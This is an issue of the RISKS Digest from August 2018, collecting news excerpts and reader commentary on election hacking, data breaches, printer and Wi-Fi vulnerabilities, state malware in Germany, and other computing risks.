RISKS Digest 30.79

Wednesday 8 August 2018

The Midterm Elections Are in Serious Danger of Being Hacked, Thanks to Trump

Mother Jones <>

Date: Fri, 3 Aug 2018 18:56:20 -0400

*As President Barack Obama* prepared to leave office, his administration had no doubt that Russia had mounted a devastating disinformation campaign and hacked our electoral systems—and would likely do it again. But President-elect Donald Trump was notably uninterested in the threat. When FBI Director James Comey and other leaders of the intelligence community visited Trump Tower in January 2017 to explain how the country had been attacked, Comey recalled in his memoir, Trump's team had “no questions about what the future Russian threat might be.'' Instead, Comey wrote, they launched “immediately into a strategy session

West Virginia to introduce mobile phone voting for midterm elections

Money.CNN <>

Date: Tue, 7 Aug 2018 19:43:28 -0400

West Virginians serving overseas will be the first in the country to cast federal election ballots using a smartphone app, a move designed to make voting in November's election easier for troops living abroad. But election integrity and computer security experts expressed alarm at the prospect of voting by phone, and one went so far as to call it "a horrific idea." ...

Ballots are anonymized, the company says, and recorded on a public digital ledger called blockchain. Although that technology is most often associated with Bitcoin and other cryptocurrencies, it can be used to record all manner of data.

Oh, it's blockchain-based. OK, then.

[See ... PGN]

Election screw-up

McClatchy <>

Date: Wed, 8 Aug 2018 5:16:09 PDT

"670 ballots in a precinct with 276 voters, and other tales from Georgia's primary"


Vint Cerf <>

Date: Sun, 5 Aug 2018 16:53:53 -0700


"This suggests to me that the notion of traceability under (internationally?) agreed circumstances (that is, differential traceability) might be a fruitful concept to explore. In most societies today, it is accepted that we must be identifiable to appropriate authorities under certain conditions (consider border crossings, traffic violation stops as examples). While there are conditions under which apparent anonymity is desirable and even justifiable (whistle-blowing, for example) absolute anonymity is actually quite difficult to achieve (another point made at the Ditchley workshop) and might not be absolutely desirable given the misbehaviors apparent anonymity invites. I expect this is a controversial conclusion and I look forward to subsequent discussion." Vint Cerf

While I have frequently called for greater accountability in key aspects of Internet operations (in particular, public access to WHOIS domain data except in limited circumstances), I fear that in the general case Vint's Traceability proposal would mostly gladden the hearts of bad governmental players in countries such as China, Russia, and even here in the USA. It basically amounts to an escrowed identity system, a concept that has been widely and appropriately criticized in the encryption arena. Given that a significant degree of anonymity is crucial for human rights advocates and others who live in areas of the world that are routinely under government oppression, I do not see obvious ways that Vint's proposal could be implemented without innocent parties being even more at the mercy of oppressive governments than they are today.

Putin is afraid of one thing ...

Michael Morell <>

Date: Wed, 8 Aug 2018 10:35:20 -0700

Putin is afraid of one thing. Make him think it could happen. Michael Morell, *The Washington Post*, 7 Aug 2018

Facebook revealed on 31 Jul 2018 that it had discovered a 17-month-long influence campaign sow political divisiveness on its network, an effort that bore the hallmarks of the Kremlin-connected Internet Research Agency. Two days later at the White House, the nation's top national security officials said Russia is conducting a pervasive campaign to weaken our democracy and influence this year's midterm elections. Taken together, these announcements leave no doubt that Russian President Vladimir Putin's political assault on the United States continues unabated.

The most important question the Trump administration and Congress should be asking is: How can we make Putin stop? Finding the answer is essential because what Washington has done so far—some improvements in defending against these attacks, along with a mixture of targeted sanctions against Russia, the indictment of Russian officials and organizations as well as the expulsion of Russian intelligence officers from the United States—has not worked.

Stopping Putin is vital, not just as a matter of protecting American democracy from Russian interference but also because we must signal a stronger deterrence to other adversaries, such as China, Iran and North Korea. Potential aggressors must be shown they will pay a price if they attack. With better resources than Russia for trying to undermine our democracy, China, in particular, needs to know that the United States would respond by imposing a heavy cost.

The U.S. answer to Russia, so far, has been ineffective because Washington has targeted only the entities and individuals actually involved in the Russian information operations. Since the 2016 election, the United States, at various times, has imposed sanctions on at least 10 Russian organizations some more than once, and at least 23 specific individuals the sanctions' targeting has had little impact on the Russian economy overall, the political effect on Putin has been minor.

Here is what the United States needs to do. In terms of self-defense, it must secure the nation's elections system, especially the software that holds data on registered voters. Every vote should be tallied on a backup paper ballot that could be used to verify election results, if necessary. New rules and better enforcement are needed to keep foreign money out of U.S. elections. The federal government should work with individual campaigns to fortify the security of the technology and networks they use. Finally, better coordination across the government is needed to protect U.S. elections, which would probably best be achieved by creating a Hybrid Threats Center similar to the National Counterterrorism Center.

Intelligence officials outline threats to midterm elections

FBI Director Christopher Wray and Homeland Security Secretary Kirstjen Nielsen on 2 Aug 2018 discussed the disinformation attempts on the 2018 elections. (Reuters)

There are several bills in Congress, all with support on both sides of the aisle, that would institute most of these changes and pay for them, but the legislation is frozen by the partisanship this issue stirs.

As for imposing costs on those who attack the United States: Fully implement sanctions already on the books. That is still not happening. But then move beyond targeted sanctions to broad-based sanctions that are designed to hurt the Russian economy—just as the Obama administration's sanctions against Iran were designed to do, as are the Trump administration's. Make it clear to Putin that we would drop the sanctions when he stopped interfering in the democratic institutions of the United States and its allies, some of which are also under siege.

What would such sanctions look like? A Senate bill introduced on 2 Aug 2018, again with sponsors from both parties, is a good start: Prohibit any transaction related to Russian energy projects and bar the purchase of new Russian sovereign debt. Washington should encourage its allies to join in these efforts.

Putin is afraid of one thing. He is afraid that one day the Russian middle class will finally rebel against his regime and rush into the streets demanding change. It happened in Tunis, Cairo and other Middle Eastern and North African cities between 2010 and 2012, and it happened most alarmingly, from Putin's perspective, four years ago in Kiev when Ukrainians threw out a government beholden to Moscow. Sanctions that bite at the heart of the Russian economy—sanctions that increase the risk that Russia's middle class will become restive—will get Putin's attention.

The leaders that the United States has chosen, and the security experts they have appointed and confirmed, are aware of the threat. A failure to defend the nation as well as possible, and failure to impose severe costs on those attacking our democracy, would be seen by history as a major abdication of responsibility. The statements from intelligence officials at the White House last week were an excellent first step. More steps, and stronger ones, are urgently needed.

Michael Morell, a career intelligence officer, served as the deputy director of the Central Intelligence Agency from 2010 to 2013; during that period, he served twice as acting CIA director. He is the host of the Intelligence Matters podcast.

[Edited for RISKS. The original has a slew of subtended URLs. PGN]

FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers' credit card data.

WashPo <>

Date: Thu, 2 Aug 2018 01:42:00 -0400

FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers' credit card data

A group called FIN7 allegedly stole the numbers of an estimated 15 million cards in a long-running scheme.

Old credit-bureau breaches

The New York Times <>

Date: Sun, 5 Aug 2018 17:55:32 -0400

These days I have been reading "Creditworthy: A History of Consumer Surveillance and Financial Identity in America". It is an excellent study of how the credit bureau / data broker industry started in the United States of America.

I was amused by the inclusion of the following news item, which could have been published yesterday:

"Credit File Password Is Stolen", New York Times, June 22nd, 1984.

A password that could permit access to the credit histories of 90 million people was stolen and posted on an electronic bulletin board, TRW Information Systems said yesterday.

[...] TRW, the nation's largest credit reporting company, said its files had been breached by someone who stole a password from a Sears, Roebuck & Company store on the West Coast. The credit company said it changed the password immediately after being told of the breach by an informant two weeks ago.

The password could have been illegally used for a month, at most, and probably a week, said Geri L. Schanz, a TRW spokesman. She said there was no indication that merchandise was illegally charged. A preliminary examination of the Sears account determined no unusual activity; a store is billed each time its password is used and billings have not been higher than normal. Miss Schanz added that the intruders would not have been able to change information on the computer files.

But TRW is conducting an intensive investigation to find out who breached the system and how. Ernest L. Arms, a spokesman for Sears in Chicago, said his company was ''concerned'' about the TRW incident, but he would supply no further details.

Computer experts yesterday said the breach again raises the issue of whether the nation's companies and consumers are adequately protected.

Yes, it definitely raised the issue.


Tech Company Sees Autonomous GA Aircraft

Russ Niles <>

Date: Mon, 6 Aug 2018 13:48:30 -0400> "plug and play" software that can make most light aircraft fly autonomously. Details on how it works have not been released but the technology will revolve around "sensing, reasoning and control," according to aviation tech website TransportUP <> It will also work on helicopters and multicopters but its designer sees its main benefit as making GA [General Aviation] accessible to the masses. According to XWing founder Marc Piette the key is getting rid of pilots.[*] “Getting a license and maintaining proficiency even on a single [-engine] aircraft type is time consuming and challenging,'' he said in a post on his website. “Removing the need for a pilot will have a significant impact in opening up the aviation market.''

Piette says that by eliminating pilots more people will be attracted to aircraft ownership and that will increase demand for small planes. The higher volumes will reduce production costs and make GA aircraft more affordable, Piette theorizes. “We see a bright future where people and places are ever more connected, where small aircraft can finally take their rightful place in the transportation landscape, and where autonomous flight will have a profound impact on society as we know it,'' he wrote. Apparently some investors are seeing that bright future as TransportUP is reporting XWing has attracted $4 million in initial investment, including some from Microsoft.

* [NOTE: The purpose of drones is to get rid of pilots and passengers. But someone has to be around to take the `blame' when something goes wrong... PGN]

2 Blasts, a Stampede and a 'Flying Thing': Witnesses Tell of Attack on Maduro

NYTimes <>

Date: Mon, 6 Aug 2018 01:38:14 -0400

A drone attack that failed to kill President Nicolas Maduro of Venezuela unfolded on live TV and in front of many witnesses: “It was like, bang, I had never heard a sound like that in my life.''

An Alaskan borough turns to typewriters and handwriting after its computers were hacked

WashPo <>

Date: Thu, 02 Aug 2018 13:10:02 +0800

Sage advice to adopt for any organization seeking resilience against ransomware opportunism. Paper files stored in filing cabinets and cooked by typewriters are immune from ransomware or DNS tunneling ex- filtration, but not fire or black bag ops (breaking & entering + theft).

HP Inkjet Printers Remote CodeEx

HP <>

Date: Tue, 7 Aug 2018 17:07:27 -0400

Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.

"German police hacking hit by volley of complaints: Can 'state trojan' law survive?"

ZDnet <>

Date: Wed, 08 Aug 2018 11:05:07 -0700

Germany's use of state-sponsored malware to fight crime is under fire from several sides.

Civil rights activists and politicians will in the coming days launch a volley of constitutional complaints against the German government over its use of state-sponsored malware in criminal investigations.

The first is that the recent law does not respect the boundaries set by the Constitutional Court in a 2008 ruling, which said state-sponsored malware, Staatstrojaner, can only be used to monitor ongoing communications, and not to search people's computers.

The second part of the GFF's argument is that “there is an indirect detrimental effect on IT security as a whole.''

Ulf Buermeyer, the organization's chairman, said: “To use one of these state-sponsored malwares, authorities usually need a security flaw in the system they want to target. These flaws can not only be exploited by German state actors, but also by foreign state actors, or by plain criminals. We argue that trojans are detrimental to our security in general. It creates a strong incentive for state actors in Germany not to disclose security flaws to vendors. We say this is a risk and the German legislature entirely neglected this risk.''

Disney's 'Christopher Robin' Won't Get China Release Amid Pooh Crackdown

Hollywood Reporter <>

Date: Mon, 6 Aug 2018 11:52:13 -0700

A source pins the blame on the country's crusade against images of the Winnie the Pooh character, which has become a symbol of the resistance with foes of the ruling Communist Party, namely Chinese leader Xi Jinping.

China's censorship regime isn't just oppressive and evil, it's utterly insane.

South Korea longs for a train to Europe but U.S. sanctions on North Korea block the way

WashPo <>

Date: Tue, 7 Aug 2018 17:11:54 -0400

The Washington Post, 3 Aug 2018

During their meeting in the peninsula's demilitarized zone in late April, South Korean President Moon Jae-in handed Kim a USB stick containing detailed plans for an inter-Korean rail network. The two Korean leaders agreed to work toward reconnecting their rail network, built under Imperial Japan at the turn of the 20th century, then severed during the Korean War in the 1950s.

Moon better hope Kim doesn't read Risks.

Magical thinking about machine learning won't bring the reality of AI any closer

The Guardian <>

Date: Sun, 5 Aug 2018 19:17:47 +0900

Keeping Zuckerberg Safe Now Costs an Extra $10 Million a Year

Bloomberg <>

Date: Sun, 5 Aug 2018 13:04:43 -0400

Your Company Needs a Digital Ombudsman. Pronto.

Medium <>

Date: Sun, 5 Aug 2018 09:31:23 -0700

via NNSquad

Who Needs this Role? Google famously convened an ethics board to ruminate over the possible dangers A.I. poses for the future. That's admirable from a Let's-Avoid-the-Robopocalypse perspective, but Google needs this position of digital ombudsman to focus on their users' concerns now. (A quick Google search reveals that I'm not the first to suggest it.) Facebook needs this position. So does Twitter. And Snapchat. And Amazon. But the need extends well beyond these obvious digital and social media companies.

One of the best articles I've seen on this topic in ages. And before anyone points it out, yeah, I did notice that it links back to my earlier discussions (updated many times over the years) regarding Google and Ombudsmen, via a link to a Techdirt article that I've previously noted.

To Fight Fake News, SETI Researchers Update Alien-Detection Scale

SciAm <>

Date: Sun, 05 Aug 2018 18:39:39 +0800

SETI has created a new calculator to assess ET's signal to Earth. The calculator uses enumerated input values, with a few range selection options, to characterize the signal structure.

The ET-for-real-calculator can be found here:

An Alaskan borough turns to typewriters and handwriting after its computers were hacked.

WashPo <>

Date: Thu, 2 Aug 2018 01:42:53 -0400

A ransomware attack infected the town's computers and email system, forcing officials to pull them offline.

UK F-35 secrets said leaked after Tinder account hacked

The Times of Israel <>

Date: Mon, 6 Aug 2018 12:22:36 -0400

A British Royal Air Force airwoman had her Tinder dating account hacked, leading to secrets about the country's new F-35 fighter jets being leaked, according to a Sunday report in the UK's Daily Mail <>

The RAF confirmed to the Mail that some information about the top secret planes was passed on to a third party after the woman's profile was hacked. The perpetrator used her account to strike up an online friendship with another member of the air force.

"New Wi-Fi attack cracks WPA2 passwords with ease"

Charlie Osborne <>

Date: Wed, 08 Aug 2018 11:23:42 -0700

Charlie Osborne for Zero Day | August 8, 2018 The common Wi-Fi security standard is no longer as secure as you think.

A new way to compromise the WPA/WPA2 security protocols has been accidentally discovered by a researcher investigating the new WPA3 standard.

The attack technique can be used to compromise WPA/WPA2-secured routers and crack Wi-Fi passwords which have Pairwise Master Key Identifiers (PMKID) features enabled.

How a bunch of lava lamps protect us from hackers

WiReD <>

Date: Tue, 7 Aug 2018 18:39:58 -0400

Edward Craven Walker lived to see his greatest invention,the lava lamp < cultural comeback. But the British tinkerer (and famed nudist, incidentally) died before he could witness the 21st-century digital potential of his analog creation. Inside the San Francisco office of theweb security company Cloudflare < groovy hardware help protect wide swaths of the Internet from infiltration.

Here's how it works. Every time you log in to any website, you're assigned a unique identification number. It should be random, because if hackers can predict the number, they'll impersonate you. Computers, relying as they do on human-coded patterns, can't generate true randomness—but nobody can predict the goopy mesmeric swirlings of oil, water, and wax. Cloudflare films the lamps 24/7 and uses the ever-changing arrangement of pixels to help create a superpowered cryptographic key. “Anything that the camera captures gets incorporated into the randomness,'' says Nick Sullivan, the company's head of cryptography < includes visitors milling about and light streaming through the windows. (Any change in heat subtly affects the undulations of those glistening globules.)

Sure,/theoretically/, bad guys could sneak their own camera into Cloudflare's lobby to capture the same scene, but the company's prepared for such trickery. It films the movements of a pendulum in its London office and records the measurements of a Geiger counter in Singapore to add more chaos to the equation. Crack that, Russians.

The Information on School Websites Is Not as Safe as You Think

NYTimes <>

Date: Sat, 4 Aug 2018 02:34:09 -0400

Some tracking scripts may be harmless. But others are designed to recognize I.P. addresses and embed cookies that collect information prized by advertisers.

Rich Irony from an "Unwitting" Liar

Henry Baker <>

Date: Sat, 04 Aug 2018 15:24:15 -0700

Is it just me, or is anyone else in computer science annoyed by James Clapper's recent apology book tour, during which he blames everyone but the intelligence community for Hillary Clinton's 30,000 lost emails?

Having been involved in the computer science field for half a century, with a personal email history almost as old, I can recall the heavy hand of the intelligence community in monopolizing encryption technology and criminalizing its export. The intelligence community's watchword: "NOBUS", meaning "NObody But U.S." (may use high-quality encryption and authentication).

This heavy hand made it impossible to incorporate encryption and authentication into the fabric of everyday computer systems, and hence impossible for computers to *routinely* protect ordinary communications like emails.

Only after Bernstein v. United States (1999) and Junger v. Daley (2000) was encryption finally permitted to become a fully integrated component of everyday computer systems.

The computer science community thus lost *forty years* of experience and software development that would have led to email systems capable of storing Hillary's emails securely—even in her home closet.

As the recent "Spectre" class of CPU vulnerabilities demonstrates, we are still living with legacy of this intelligence community "unwitting" (I prefer "witless") blunder.

I would like to repeat to James Clapper what my grandmother used to say to me when I was a child: "when you point your (index) finger at someone, your other four fingers are pointing at yourself."

I also have a better suggestion for the name of Clapper's book:

"Redacts and Sneers: Half Truths from a Liar in Intelligence"

rather than

"Facts and Fears: Hard Truths from a Life in Intelligence"

Christina Pazzanese Harvard Staff Writer 22 Jun 2018 The worries over U.S. intelligence

Former Director of National Intelligence James Clapper says he felt compelled to speak out about President Trump and the investigation into Russia's interference in the 2016 election.

Socially engineering a whale ...

Rob Slade <>

Date: Fri, 3 Aug 2018 12:45:52 -0700

When you know who someone is, have followed their patterns, and know who their friends are, you can get them to respond to phishing messages.

At least, that was the theory when DFO lured an orca away from the harbour where he had taken up residence. (And now someone is going to take issue with "residence," since he was not from one of the resident pods, but was a transient.) or

(And, yes, I know that orcas are delphinidae and therefore not true whales ...)

(And, yes, I meant phishing, not fishing.)

(false positive, identification, identity theft, impersonation, phishing, social engineering, social media)

(Oh, you want even more links to security? Well, there is life safety, since transients feed on mammals, and that's what we are ...)

(See also under "bears":

Re: The Ordinary License Plate's Days May Be Numbered

Wol <>

Date: Thu, 2 Aug 2018 19:29:39 +0100

It always amazes me not many countries follow the UK approach, where in normal circumstances the licence plate stays with the vehicle from manufacture to destruction.

And I'm sure plenty of people will scream about the risks of ANPR (automatic number plate recognition) but it works well - mostly - for us where a computer in a police car scans neighbouring plates, then checks them against an online database for tax and insurance. Traders have a special plate which allows them to drive vehicles that are otherwise not registered, taxed or insured.

This does, however, bring another risk into play. So many bills are paid monthly now, including insurance, so if you aren't alert it's far too easy - as happened to my daughter - for the insurance debit to bounce, the insurance company cancels the policy, the ANPR picks up your vehicle, and you get stopped for driving the vehicle without insurance. And the insurance company normally does NOT notify you that the payment bounced! In those circumstances, you are supposed either to re-insure your vehicle, at the roadside, by (smart)phone or the police will seize the vehicle. My daughter was lucky - the police let her proceed when she couldn't contact her insurers but many people have had their vehicle seized and it usually costs about

Re: Employees as subjects in clinical trials

Robert R. Fenichel <>

Date: Wed, 1 Aug 2018 21:14:17 -0400

I'm sorry if I misinterpreted what Dimitri Maziuk said a few issues ago. Other followers of RISKS will need to review the entries and, as they see fit, apportion fault between the transmission & reception functions in our communication.

Reply to